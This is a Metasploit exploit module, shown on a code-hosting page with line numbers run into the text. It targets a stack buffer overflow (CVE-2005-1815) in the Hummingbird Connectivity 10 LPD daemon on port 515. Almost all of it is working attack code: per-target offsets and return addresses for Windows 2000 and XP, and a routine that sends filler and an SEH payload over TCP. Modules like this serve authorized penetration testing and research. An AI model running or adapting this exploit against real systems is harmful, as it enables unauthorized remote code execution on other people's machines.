Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/modules/exploits/windows/lpd/hummingbird_exceed.rb
Views: 11655
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = AverageRanking78include Msf::Exploit::Remote::Tcp9include Msf::Exploit::Remote::Seh1011def initialize(info = {})12super(update_info(info,13'Name' => 'Hummingbird Connectivity 10 SP5 LPD Buffer Overflow',14'Description' => %q{15This module exploits a stack buffer overflow in Hummingbird Connectivity1610 LPD Daemon. This module has only been tested against Hummingbird17Exceed v10 with SP5.18},19'Author' => [ 'MC' ],20'License' => MSF_LICENSE,21'References' =>22[23['CVE', '2005-1815'],24['OSVDB', '16957'],25['BID', '13788'],26],27'Privileged' => true,2829'DefaultOptions' =>30{31'EXITFUNC' => 'thread',32},33'Payload' =>34{35'Space' => 500,36'BadChars' => "\x00\x0a",37'StackAdjustment' => -3500,38},39'Platform' => 'win',40'Targets' =>41[42['Windows 2000 English SP0-SP4', { 'Offset' => 1620, 'Ret' => 0x75022ac4 }],43['Windows XP English SP0/SP1', { 'Offset' => 1596, 'Ret' => 0x71aa2461 }],44],4546'DisclosureDate' => '2005-05-27'))4748register_options( [ Opt::RPORT(515) ])49end5051def exploit52connect5354filler = rand_text_english(target['Offset'], payload_badchars)55seh = generate_seh_payload(target.ret)56sploit = filler + seh5758print_status("Trying target #{target.name}...")59sock.put(sploit)6061handler62disconnect63end64end656667